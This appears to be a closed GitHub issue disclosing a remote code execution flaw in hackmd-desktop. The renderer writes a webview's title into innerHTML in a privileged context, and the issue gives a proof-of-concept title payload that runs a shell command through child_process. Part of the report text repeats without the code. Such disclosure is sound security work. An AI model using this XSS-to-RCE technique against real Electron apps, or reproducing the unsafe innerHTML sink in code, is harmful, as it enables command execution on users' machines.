Closed 5alt closed 5 years ago
Hi, I find a RCE in hackmd-desktop when viewing a evil note.
In renderer.js
webview.addEventListener('dom-ready', function () { // set webview title document.querySelector('#navbar-container .title').innerHTML = webview.getTitle() document.querySelector('title').innerHTML = webview.getTitle() })
It will render the title of the webview in a privileged context.
If we use tag or a XSS(https://github.com/hackmdio/codimd/issues/1233) to redirect to a evil page with a payload in title like this.
<head> <title><img src=1 onerror="process.mainModule.require('child_process').exec('open /Applications/Calculator.app')"></title> </head>
It will execute the command in the payload and a calculator will pop up.
Hi, I find a RCE in hackmd-desktop when viewing a evil note.
In renderer.js
It will render the title of the webview in a privileged context.
If we use tag or a XSS(https://github.com/hackmdio/codimd/issues/1233) to redirect to a evil page with a payload in title like this.
It will execute the command in the payload and a calculator will pop up.